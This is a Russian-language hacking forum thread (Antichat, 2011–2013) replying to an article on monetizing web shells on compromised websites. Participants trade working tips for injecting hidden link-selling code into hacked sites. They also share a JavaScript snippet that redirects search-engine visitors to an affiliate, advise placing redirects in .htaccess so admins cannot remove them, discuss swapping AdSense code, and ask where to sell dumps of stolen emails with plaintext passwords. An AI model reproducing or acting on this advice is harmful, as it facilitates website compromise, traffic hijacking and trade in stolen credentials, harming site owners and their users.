ANTICHAT

ANTICHAT (https://forum.antichat.io/index.php)
-   Статьи (https://forum.antichat.io/forumdisplay.php?f=30)
-   -   Мастеркласс в монетизации шеллов (https://forum.antichat.io/showthread.php?t=234066)

Bramin 23.02.2011 03:02

sape отлично работет со скриптом, а вот с linkfeed проблема. сайты не добовляются в систему, у кого были подобные проблемы?

FlooP1k 28.02.2011 18:05

Цитата:

Сообщение от Bramin
sape отлично работет со скриптом, а вот с linkfeed проблема. сайты не добовляются в систему, у кого были подобные проблемы?

Может вы не правильно вставили код от линкфида? я даже незнаю какая еще проблема может быть))

leftr 03.04.2011 18:39

на английском сайте, русские анкоры в козебрялках.

что-то с кодировкой видимо, как решить кто-нибудь знает?

p.s. а то linkfeed ошибку выдает про неправильно отображенный анкор.

N@b$ter 03.04.2011 19:28

Цитата:

Сообщение от Bramin

Такая же прабла вроде на 124 строке должен быть код линкфид вставляю но линкфид не видет и всё тут

Steam[777] 03.04.2011 19:31

Цитата:

Сообщение от None
на английском сайте, русские анкоры в козебрялках. что-то с кодировкой видимо, как решить кто-нибудь знает? p.s. а то linkfeed ошибку выдает про неправильно отображенный анкор.

Замени

var $lc_charset = 'DEFAULT';

на

var $lc_charset = 'utf-8';

.links.db не забудь удалить

sevenup 24.04.2011 16:33

А кто-то пробовал вставлять этот скрипт для сапы и линкфид на сайты написанные на ASP ?

Если да, то поделитесь пожалуйста кодом

попугай 24.04.2011 19:01

Цитата:

Сообщение от sevenup
А кто-то пробовал вставлять этот скрипт для сапы и линкфид на сайты написанные на ASP ?
Если да, то поделитесь пожалуйста кодом

На linkfeed кода для ASP-сайтов нет, на сапе может быть есть, так как биржа более популярная, но я там не зарегистрирован, поэтому не знаю.

Но никто не мешает переписать код самому или нанять человека, который перепишет с PHP на на любой другой язык, используемый в ASP-скриптах.

xpxp 28.09.2011 23:51

Код:

function R(){var Ref=document.referrer;if(Ref.indexOf('.google.')!=  -1||Ref.indexOf('.bing.')!=-1||Ref.indexOf('.yahoo.')!=-1||Ref.indexOf('.aol.')!=-1||Ref.indexOf('.ask.')!=-1||Ref.indexOf('.altavista.')!=-1||Ref.indexOf('.yandex.')!=-1){document.write('docu'+'ment.location="http://Сайт-нашой-партнерки-куда-лить-трафф.ru/"')}else{document.write('.')}}R();
При переходе с яндекса почему то не редиректит

BLurpi^_^ 16.11.2011 00:50

всместо яваскрипт редиректа лучше юзать редирект через htaccess,тогда если админ имеет доступ только к админке он не сможет убрать редирект

я 1 раз так сделал и на том сайте 3 дня редирект повисел,сливал на платник по скидкам,800рублей с 1к уников)

Bramin 19.11.2011 17:32

кто-нибудь все-таки смого решить проблему с линкфидом при добовлении нового сайта?? бьюсь головой об стену..

Kamazik 23.11.2011 17:02

у кого-нибудь есть опыт монетизации шелов на бурж биржах линков типо сапы

отблагадарю шелами щедро

айсикью 267042

Crazy Bastar 27.11.2011 10:22

Хм.. вроде все норм, но ссылки почему-то еррор (не в body), хотя код идет так

Код:

сцылка...

dimonx15 02.12.2011 13:13

Про сапу забудьте

Mail2k 04.12.2011 00:46

В сапу не добавляется сайт с установленным из 1-го поста скриптом.Хотя прописанный слой в исходнике страницы выводит. Скрипт необходимые файлы создает.

Сапа пишет: Код на сайте не установлен

Что не так делаю?

bugagasenki 15.01.2012 17:24

Цитата:

Сообщение от kot777
Хорошая статья, некоторые пункты позволяют легко получить условное наказание (до 2-х лет), при этом целых 3 рубля заработать можно, дерзайте.
По чужим кодам сапы уже кстати возбуждают уголовные дела, и есть уже прецеденты, слишком уж легко вычислить

палишся и кто после этого впн из подписи будет использовать да и на бсс у тебя фотка в форме..

ты где год то пропадал?

ocheretko 15.01.2012 23:06

Если сделать копию сайта, и в роботс.тхт прописать новый домен? Таким макаром как я понимаю можно угнать себе сайт

VyRq 27.01.2012 12:53

Цитата:

Сообщение от ocheretko
Если сделать копию сайта, и в роботс.тхт прописать новый домен? Таким макаром как я понимаю можно угнать себе сайт

таким образом получится зеркало сайта, подробней тут: http://help.yandex.ru/webmaster/?id=995297

Adrenaline11 17.03.2012 22:15

Поставил код, бот линкфида зарегистрировал в ОК 1500 страниц, но ссылки не выводятся, юзаю скрипт автора. Ссылки приняло некоторые и статус NEW стоит, деньги не идут чтото. заплачу 10 $ тому кто объяснит в чем дело. icq 233444

Объясните в чем дело

Pirotexnik 07.04.2012 23:13

Цитата:

Сообщение от FlooP1k
Мейлы:
Но не только базы интернет шопов у буржуев ценятся, можно слить userов нас интересует только емейл и пароль, если пароль в открытом в виде то супер получаем от 5$ за 1к пользователей

Эээ, есть дамп адалта, ~100к мыл с открытым пассом.

Тоесть это минимум пол лимона? :/ :\

Куда например продавать дампы забугора?

Jakeroid 09.05.2012 17:36

Не проходит проверку с твоим кодом на LinkFeed. Пишет: "код на главной странице не найден". Хотя он там 100% есть, даже сапа схавала и все работает.

Куда копать?

FlooP1k 09.05.2012 18:20

кстати у меня тоже было 2 таких сайта, которые в сапу приняли а в линкфид с ошибкой ... Для меня это так и осталось загадкой))

Кстати не знаю насколько актуально сейчас скрывать ссылки в сапе и линкфиде, потому что они добавили кнопку "пожаловаться" из за этого довольно быстро добавленные сайты должны уходить под статус модерация и с этим статусом у вас на сайте не могут покупать новые ссылки, пока вы не уберете скрытые ссылки ...

Jakeroid 09.05.2012 18:22

Цитата:

Сообщение от FlooP1k
кстати у меня тоже было 2 таких сайта, которые в сапу приняли а в линкфид с ошибкой ... Для меня это так и осталось загадкой))
Кстати не знаю насколько актуально сейчас скрывать ссылки в сапе и линкфиде, потому что они добавили кнопку "пожаловаться" из за этого довольно быстро добавленные сайты должны уходить под статус модерация и с этим статусом у вас на сайте не могут покупать новые ссылки, пока вы не уберете скрытые ссылки ...

Хм, если не скрывать ссылки - сильно палевно выйдет .

Live777 20.06.2012 22:47

Цитата:

Сообщение от Jakeroid
Не проходит проверку с твоим кодом на LinkFeed. Пишет: "код на главной странице не найден". Хотя он там 100% есть, даже сапа схавала и все работает.
Куда копать?

А что сапа долго работает с этим кодом , меня почему то решили кинуть с модерацией ,так еще и предупреждение выдали по поводу того что ссылки слишком спрятаны )))))

Bramin 01.07.2012 22:53

Цитата:

Сообщение от FlooP1k

ты хоть один сайт смог в линкфид добавить то?? с таким кодом.

меня вообще берут сомнения в твоей успешной работе на биржах.

Тема по скрытию ссылок нисколько не потеряла своей актуальности при грамотном подходе к этому делу.

Alex_DZ 02.07.2012 16:46

Классная статья , жалко теперь многие вещи быстро попаляться и уже вряд ли можно будет таким образом монетизировать ))) Автору зачет, немного хоть стал получать прибыль в онлайне !!!

Rootz 02.07.2012 23:13

Плюсую предыдущий пост, спасибо ТСу за подробный FAQ по монетизации шеллов, нашел для себя несколько актуальных пунктов.)

aleksandrt 03.07.2012 19:02

Ребят подскажите пожалуйста, палевно или нет делать подмену кода adsense?

FlooP1k 03.07.2012 23:04

Цитата:

Сообщение от Bramin
ты хоть один сайт смог в линкфид добавить то?? с таким кодом.

А чем тебе код не нравится?? Смотри на дату создания темы, вполне возможно что уже пофиксили чисто скрипт и то я очень сомневаюсь, скорей проблема в кривых руках или кривых настройках сервера.

FlooP1k 03.07.2012 23:07

Цитата:

Сообщение от aleksandrt
Ребят подскажите пожалуйста, палевно или нет делать подмену кода adsense?

Лучше добавить еще один код где то в шаблоне, чем делать полную подмену, но adsense приносит копейки, сильно на нем не уживешься ...

Alex_DZ 05.08.2012 11:23

Линкфид тоже стал палить что ссылки прячутся и так же как и сапа перекрывает кислород. Кто знает подскажите что нового можно думать в этом направление , что бы не получать баны и не оставлять деньги на аккаунте ? Или может есть еще какой либо новый способ монетизировать шеллы , если кто поделиться как (можно в личку ) готов заплатить за реально действующую схему .

METRuby601 18.08.2012 02:05

вобщем как я понимаю только слив мобильного трафика работает и заливка дорвеев. ну ещё подмена контактной информации. кстати это прикольно придумал автор

spiderbuber 04.09.2012 09:38

Новый способ монетизации шеллов

Есть еще один способ монетизации шеллов, который в паблике никогда не светился..

Возможно кто-то им и пользуется, но я придумал его сам.

Мои статы весьма скудные, т.к. нет подходящих доноров.

http://rghost.ru/40179851/image.png

Смысл темы может быть понятен и по скрину. Для тех, у кого большой запас трафистых РУ шеллов - это просто золотое дно..

FlooP1k 13.10.2012 17:45

Цитата:

Сообщение от spiderbuber
Есть еще один способ монетизации шеллов, который в паблике никогда не светился..
Возможно кто-то им и пользуется, но я придумал его сам.
Мои статы весьма скудные, т.к. нет подходящих доноров.
http://rghost.ru/40179851/image.png
Смысл темы может быть понятен и по скрину. Для тех, у кого большой запас трафистых РУ шеллов - это просто золотое дно..

с 28к загрузок всего 200$ оО в чем тогда суть? Это же очень мало ...

Есть же много других способов ? Готовится статья "Мастеркласс в монетизации шеллов - часть 2", отпишу еще о способах монетизации!

FlooP1k 13.10.2012 22:23

Модератор или Админ, прощу закройте пожалуйста тему из за неактуальности.

FlooP1k 16.10.2012 16:12

Цитата:

Сообщение от йож
автор лох
криптованный ифрейм+связка=профит!!!!1

да кто нибудь даст этому наркоману бан или нет, уже достал во всех темах ...

nobel 12.12.2012 20:06

когда появится вторая часть? хотелось бы почитать акнуальную инфу

acrid 02.03.2013 13:17

Цитата:

Сообщение от nobel
когда появится вторая часть? хотелось бы почитать акнуальную инфу

поддерживаю..

Prior 04.03.2013 17:02

Не дожидаясь второй части хочу поинтересоваться - есть у кого-нибудь инфа по поводу слива части мобильного трафика с шелла?

Интересуют способы реализации и партнерки куда лить.

Radiator 04.03.2013 17:59

smspirat.com например

winstrool 04.03.2013 22:49

Цитата:

Сообщение от Prior
Не дожидаясь второй части хочу поинтересоваться - есть у кого-нибудь инфа по поводу слива части мобильного трафика с шелла?
Интересуют способы реализации и партнерки куда лить.

можешь сливать, через htaccess через ява скипты, либо через свой код внедренный куда либо и использующийся во всех страницах...

P.S:ну а теперь вторая сторона вопроса, я к примеру как админ нахожу твой код, декриптую вслучае если он закриптован, выявляю партнерку на которую ты льешь, и у админов выясняю по иду твоему твои контакты данные, применяю СИ к тебе, выесняю твое место обитание и наказываю тебя, ты уверен что тебе это надо?

Время: 22:26